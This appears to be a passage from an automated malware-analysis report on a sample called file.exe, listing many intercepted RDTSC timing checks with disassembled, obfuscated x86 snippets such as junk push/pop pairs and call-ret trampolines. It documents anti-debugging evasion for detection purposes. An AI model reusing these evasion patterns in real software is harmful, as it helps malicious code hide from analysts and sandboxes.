Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EE9946 second address: EE99DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007F2AD9523878h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push ebx 0x00000027 call 00007F2AD9523878h 0x0000002c pop ebx 0x0000002d mov dword ptr [esp+04h], ebx 0x00000031 add dword ptr [esp+04h], 00000017h 0x00000039 inc ebx 0x0000003a push ebx 0x0000003b ret 0x0000003c pop ebx 0x0000003d ret 0x0000003e mov edx, 606FE0E7h 0x00000043 call 00007F2AD9523879h 0x00000048 jmp 00007F2AD9523888h 0x0000004d push eax 0x0000004e pushad 0x0000004f push edx 0x00000050 pushad 0x00000051 popad 0x00000052 pop edx 0x00000053 jns 00007F2AD9523878h 0x00000059 popad 0x0000005a mov eax, dword ptr [esp+04h] 0x0000005e jnl 00007F2AD952387Ah 0x00000064 mov eax, dword ptr [eax] 0x00000066 pushad 0x00000067 push eax 0x00000068 push edx 0x00000069 push eax 0x0000006a push edx 0x0000006b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EE99DD second address: EE99E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EE99E1 second address: EE99E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EE99E5 second address: EE99EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EE9AC4 second address: EE9AC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EE9AC8 second address: EE9ACE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EE9B15 second address: EE9B27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 jnl 00007F2AD9523880h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EE9B27 second address: EE9B8D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edx 0x0000000a call 00007F2AD900F598h 0x0000000f pop edx 0x00000010 mov dword ptr [esp+04h], edx 0x00000014 add dword ptr [esp+04h], 0000001Ch 0x0000001c inc edx 0x0000001d push edx 0x0000001e ret 0x0000001f pop edx 0x00000020 ret 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push eax 0x00000026 call 00007F2AD900F598h 0x0000002b pop eax 0x0000002c mov dword ptr [esp+04h], eax 0x00000030 add dword ptr [esp+04h], 00000018h 0x00000038 inc eax 0x00000039 push eax 0x0000003a ret 0x0000003b pop eax 0x0000003c ret 0x0000003d movsx esi, di 0x00000040 call 00007F2AD900F599h 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007F2AD900F59Bh 0x0000004c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE9B8D second address: EE9BC4 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2AD952387Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b js 00007F2AD952388Dh 0x00000011 pushad 0x00000012 jmp 00007F2AD9523883h 0x00000017 push edi 0x00000018 pop edi 0x00000019 popad 0x0000001a mov eax, dword ptr [esp+04h] 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE9BC4 second address: EE9BCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F2AD900F596h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE9BCF second address: EE9C79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AD9523885h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007F2AD9523887h 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 pushad 0x00000015 pushad 0x00000016 jmp 00007F2AD9523880h 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e push ecx 0x0000001f pushad 0x00000020 popad 0x00000021 pop ecx 0x00000022 popad 0x00000023 pop eax 0x00000024 add si, BB36h 0x00000029 push 00000003h 0x0000002b mov edi, 7F6C4309h 0x00000030 push 00000000h 0x00000032 jp 00007F2AD952387Ch 0x00000038 mov dword ptr [ebp+122D37EBh], ebx 0x0000003e push 00000003h 0x00000040 push 00000000h 0x00000042 push eax 0x00000043 call 00007F2AD9523878h 0x00000048 pop eax 0x00000049 mov dword ptr [esp+04h], eax 0x0000004d add dword ptr [esp+04h], 00000015h 0x00000055 inc eax 0x00000056 push eax 0x00000057 ret 0x00000058 pop eax 0x00000059 ret 0x0000005a sub dword ptr [ebp+122D2D02h], esi 0x00000060 adc edi, 413D611Ch 0x00000066 push 9EB2E900h 0x0000006b pushad 0x0000006c je 00007F2AD952387Ch 0x00000072 push eax 0x00000073 push edx 0x00000074 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFBF07 second address: EFBF0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFBF0B second address: EFBF18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0C538 second address: F0C542 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0C542 second address: F0C547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0C547 second address: F0C54D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0C54D second address: F0C551 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED4AA8 second address: ED4AAE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0A919 second address: F0A932 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AD9523885h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0A932 second address: F0A94F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F2AD900F598h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F2AD900F59Bh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0A94F second address: F0A953 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0AEA8 second address: F0AEB2 instructions: 0x00000000 rdtsc 0x00000002 je 00007F2AD900F596h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0AEB2 second address: F0AEB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0B01F second address: F0B023 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0B307 second address: F0B331 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 jg 00007F2AD9523876h 0x0000000e popad 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 jp 00007F2AD9523888h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0B331 second address: F0B337 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0B337 second address: F0B33B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0B715 second address: F0B71D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0B71D second address: F0B73C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2AD952387Bh 0x00000009 pop ecx 0x0000000a popad 0x0000000b jl 00007F2AD9523888h 0x00000011 push eax 0x00000012 push edx 0x00000013 jnc 00007F2AD9523876h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0BE7B second address: F0BE7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0BE7F second address: F0BE91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2AD952387Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0BE91 second address: F0BE9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F2AD900F596h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0BFD2 second address: F0BFD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0BFD6 second address: F0BFE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0BFE0 second address: F0BFE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0EA1D second address: F0EA49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F2AD900F5ACh 0x0000000c jmp 00007F2AD900F5A6h 0x00000011 popad 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDB396 second address: EDB3B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F2AD9523889h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F18B05 second address: F18B13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F2AD900F596h 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F18C5D second address: F18C79 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F2AD9523876h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b pushad 0x0000000c jno 00007F2AD952387Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F18C79 second address: F18C7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1939E second address: F193A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F19DF0 second address: F19E2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AD900F59Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007F2AD900F59Eh 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 jns 00007F2AD900F5A5h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F19E2C second address: F19E48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AD952387Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007F2AD9523876h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F19E48 second address: F19E4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F19E4E second address: F19E71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AD952387Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov esi, dword ptr [ebp+122D2C6Ch] 0x00000010 push 4861DED2h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F19E71 second address: F19E75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F19E75 second address: F19E7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1A1C8 second address: F1A1E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F2AD900F59Ch 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007F2AD900F598h 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1A2E3 second address: F1A2E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1A2E7 second address: F1A2F9 instructions: 0x00000000 rdtsc 0x00000002 js 00007F2AD900F596h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1A2F9 second address: F1A2FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1A2FD second address: F1A303 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1A62A second address: F1A62E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1AB11 second address: F1AB1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F2AD900F596h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1AFA9 second address: F1AFAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1AFAF second address: F1AFC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F2AD900F59Ah 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1B5B5 second address: F1B5BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1BDB1 second address: F1BDB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1DB67 second address: F1DB6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1E59B second address: F1E5F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov si, bx 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007F2AD900F598h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 0000001Ch 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a push 00000000h 0x0000002c mov dword ptr [ebp+12457A9Ah], esi 0x00000032 xchg eax, ebx 0x00000033 jnp 00007F2AD900F59Ah 0x00000039 push edi 0x0000003a push edx 0x0000003b pop edx 0x0000003c pop edi 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F2AD900F59Eh 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1F0A2 second address: F1F0B8 instructions: 0x00000000 rdtsc 0x00000002 js 00007F2AD9523878h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d js 00007F2AD952387Eh 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1C78F second address: F1C793 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1D8BE second address: F1D8C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1C793 second address: F1C7A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F2AD900F596h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1EE30 second address: F1EE35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1F920 second address: F1F950 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007F2AD900F59Dh 0x0000000f jmp 00007F2AD900F5A0h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jne 00007F2AD900F596h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1FB9B second address: F1FBE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push 00000000h 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F2AD9523878h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 0000001Dh 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 add esi, 4D535F1Ah 0x0000002c mov dword ptr [ebp+122D1D96h], edx 0x00000032 push eax 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 js 00007F2AD9523876h 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1FBE4 second address: F1FBE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2078E second address: F20792 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F204D4 second address: F204D9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F20792 second address: F20798 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F20798 second address: F2079E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F24A41 second address: F24A46 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F24A46 second address: F24A53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F21014 second address: F2101A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F24A53 second address: F24A97 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 nop 0x00000008 or dword ptr [ebp+122D25D5h], edi 0x0000000e or dword ptr [ebp+122D1B42h], ecx 0x00000014 push 00000000h 0x00000016 jmp 00007F2AD900F5A3h 0x0000001b push 00000000h 0x0000001d mov ebx, eax 0x0000001f mov ebx, dword ptr [ebp+122D17FAh] 0x00000025 xchg eax, esi 0x00000026 push ecx 0x00000027 push eax 0x00000028 js 00007F2AD900F596h 0x0000002e pop eax 0x0000002f pop ecx 0x00000030 push eax 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F24A97 second address: F24A9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F25A08 second address: F25AC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2AD900F5A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F2AD900F598h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 call 00007F2AD900F5A5h 0x0000002b or dword ptr [ebp+1247684Fh], ebx 0x00000031 pop ebx 0x00000032 mov edi, esi 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push edx 0x00000039 call 00007F2AD900F598h 0x0000003e pop edx 0x0000003f mov dword ptr [esp+04h], edx 0x00000043 add dword ptr [esp+04h], 0000001Bh 0x0000004b inc edx 0x0000004c push edx 0x0000004d ret 0x0000004e pop edx 0x0000004f ret 0x00000050 push 00000000h 0x00000052 push 00000000h 0x00000054 push ecx 0x00000055 call 00007F2AD900F598h 0x0000005a pop ecx 0x0000005b mov dword ptr [esp+04h], ecx 0x0000005f add dword ptr [esp+04h], 00000015h 0x00000067 inc ecx 0x00000068 push ecx 0x00000069 ret 0x0000006a pop ecx 0x0000006b ret 0x0000006c mov dword ptr [ebp+122D34D4h], ecx 0x00000072 push eax 0x00000073 push eax 0x00000074 push edx 0x00000075 jmp 00007F2AD900F5A1h 0x0000007a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F24B7F second address: F24B83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F25BBF second address: F25BCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F2AD900F596h 0x0000000a popad 0x0000000b rdtsc
